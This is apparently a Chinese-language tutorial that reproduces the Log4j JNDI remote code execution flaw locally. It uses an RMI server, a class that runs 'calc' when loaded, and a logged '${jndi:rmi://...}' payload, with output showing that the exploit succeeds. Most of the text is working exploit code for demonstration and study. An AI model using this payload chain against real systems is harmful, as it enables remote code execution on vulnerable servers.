快速复现利用Log4j漏洞启动windows计算器

了解关于漏洞的描述，可以参考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit

根据文章描述，首先下载JDK1.8u102，不能高于这个版本。

通过如下pom.xml建立一个maven项目

<project xmlns="http://maven.apache.org/POM/4.0.0"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<groupId>Log4jJNDI</groupId>
	<artifactId>Log4jJNDI</artifactId>
	<version>0.0.1-SNAPSHOT</version>
	<properties>
		<java.version>1.8</java.version>
	</properties>
	<dependencies>
		<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
		<dependency>
			<groupId>org.apache.logging.log4j</groupId>
			<artifactId>log4j-core</artifactId>
			<version>2.14.1</version>
		</dependency>
	</dependencies>
	    <build>
    <plugins>
        <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <version>3.7.0</version>
        <configuration>
            <source>${java.version}</source>
            <target>${java.version}</target>
        </configuration>
        </plugin>
    </plugins>
    </build>
</project>

新建类Log4jServer，这个类用来注册一个远程类。代码如下：

package testLog4j;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;

public class Log4jServer {
	public static void main(String[] args) {
		try {
			LocateRegistry.createRegistry(1099);
			Registry registry = LocateRegistry.getRegistry();
			Reference evilObjReference = new Reference("testLog4j.EvilObj", "testLog4j.EvilObj", ".");
			ReferenceWrapper evilObjReferenceObjWrapper = new ReferenceWrapper(evilObjReference);
			registry.bind("evilObj", evilObjReferenceObjWrapper);

			System.out.println("Server is running at port: 1099");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}

用于打开计算器的远程类代码如下：

package testLog4j;

public class EvilObj {
	static {
		try {
			Runtime.getRuntime().exec("calc");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}

}

下面的LogTest类用于展示如何通过打印日志，来调用远程类，

package testLog4j;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LogTest {
	private static Logger logger = LogManager.getLogger("LogTest");

	public static void main(String[] args) {
		logger.info("your operation system is: {}", "${java:os}");
		logger.error("${jndi:rmi://127.0.0.1:1099/evilObj}");
	}
}

首先运行Log4jServer类，此时在端口1099提供远程类访问。

然后再运行LogTest, 在打印如下日志以后，windows下的计算机被成功打开。运行时需要设置参数-Dlog4j2.formatMsgNoLookups=false

12-17 22:15:42.331 [main] INFO  LogTest
your operation system is: Windows 10 10.0, architecture: amd64-64

12-17 22:15:42.334 [main] ERROR LogTest
${jndi:rmi://127.0.0.1:1099/evilObj}

Good Luck,

Cheers!